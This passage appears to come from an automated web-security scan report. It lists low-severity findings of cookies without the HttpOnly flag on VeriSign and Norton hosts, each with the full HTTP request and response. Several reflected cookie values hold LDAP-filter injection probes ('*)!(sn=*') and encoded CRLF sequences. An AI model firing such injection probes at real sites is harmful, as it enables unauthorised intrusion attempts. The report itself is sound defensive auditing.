Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=806370F1B7465CBED58C1BE853F86CDD.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"2822-1312807390000"
Last-Modified: Mon, 08 Aug 2011 12:43:10 GMT
Content-Length: 2822
Content-Type: image/png

.PNG
.
...IHDR.............8.e.... pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

10.35. http://vipmobile.verisign.com/images/bl_shadow.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/bl_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4C16EF1CD603E479FE111492DDD71824.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/bl_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=4C16EF1CD603E479FE111492DDD71824.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"3072-1312807392000"
Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT
Content-Length: 3072
Content-Type: image/png

.PNG
.
...IHDR...
.........,l.6... pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

10.36. http://vipmobile.verisign.com/images/br_shadow.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/br_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0CBB339A5F3FC6CA6B3243DB5693898F.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/br_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=0CBB339A5F3FC6CA6B3243DB5693898F.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"3116-1312807392000"
Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT
Content-Length: 3116
Content-Type: image/png

.PNG
.
...IHDR.............!rlq... pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

10.37. http://vipmobile.verisign.com/images/dot.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/dot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=BC68623295528D6637E6ECFE1FA511A9.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/dot.gif HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=BC68623295528D6637E6ECFE1FA511A9.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"43-1312807392000"
Last-Modified: Mon, 08 Aug 2011 12:43:12 GMT
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.38. http://vipmobile.verisign.com/images/home_rght_box.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/home_rght_box.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5B016AD80C52B4540E9C0C7B68B7A4D7.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/home_rght_box.gif HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=5B016AD80C52B4540E9C0C7B68B7A4D7.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"7996-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 7996
Content-Type: image/gif

GIF89a7.A..............................................................................................................................................................................................
...[SNIP]...

10.39. http://vipmobile.verisign.com/images/r_shadow.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/r_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0F41858F0BA8CAFB3B967BE1BD5FBA25.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/r_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=0F41858F0BA8CAFB3B967BE1BD5FBA25.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"2817-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 2817
Content-Type: image/png

.PNG
.
...IHDR.............l.$"... pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

10.40. http://vipmobile.verisign.com/images/rt_shadow.png previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/rt_shadow.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/rt_shadow.png HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"3050-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 3050
Content-Type: image/png

.PNG
.
...IHDR.......
......+.l... pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

10.41. http://vipmobile.verisign.com/images/topleft.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vipmobile.verisign.com
Path:	/images/topleft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=31209521096AE0F9176A973D15DA8603.tomcat2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/topleft.gif HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Referer: http://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 22:03:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=31209521096AE0F9176A973D15DA8603.tomcat2; Path=/
Accept-Ranges: bytes
ETag: W/"59-1312807394000"
Last-Modified: Mon, 08 Aug 2011 12:43:14 GMT
Content-Length: 59
Content-Type: image/gif

GIF89a..
..........!.......,......
.......`y. d..Co.[.y...;

10.42. https://vipmobile.verisign.com/fpa/fpa.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://vipmobile.verisign.com
Path:	/fpa/fpa.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=6F5A301A8F818418D8466F49AD192735.tomcat1; Path=/fpa; Secure

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fpa/fpa.jsp HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://vipmobile.verisign.com/home.v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:52:08 GMT
Server: Apache
Set-Cookie: JSESSIONID=6F5A301A8F818418D8466F49AD192735.tomcat1; Path=/fpa; Secure
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 108420

var urlProtocol = ('https:' == document.location.protocol ? 'https://' : 'http://');

// Customizable variables
var hostUri = urlProtocol + "vipmobile.verisign.com/fpa";
var cookieDomain = '.v
...[SNIP]...

10.43. http://buy.norton.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:24; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:24 GMT
Location: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=3bf0ac89-952a-4b3e-84b4-5a334e35934e1315604244143
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:37:24; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:24 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 413

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/la
...[SNIP]...

10.44. http://buy.norton.com/ps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/ps

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:23; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ps HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.45. http://buy.norton.com/special-promotions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/special-promotions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LASTTIME_CV_DATE=Sep-09-2011 14:31:2053e95%250d%250ad87014f842f; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:37:25; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
TrafficSourceCookieName=other; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/
CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:37:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /special-promotions HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.46. http://buy.norton.com/support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.norton.com
Path:	/support

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16b8014%250d%250ae956c741f6e; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
COUNTRY=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
LANGUAGE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID_CREATED_DATE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAMID=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
PROGRAM_TYPE=*)!(sn=*)!(sn=*; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
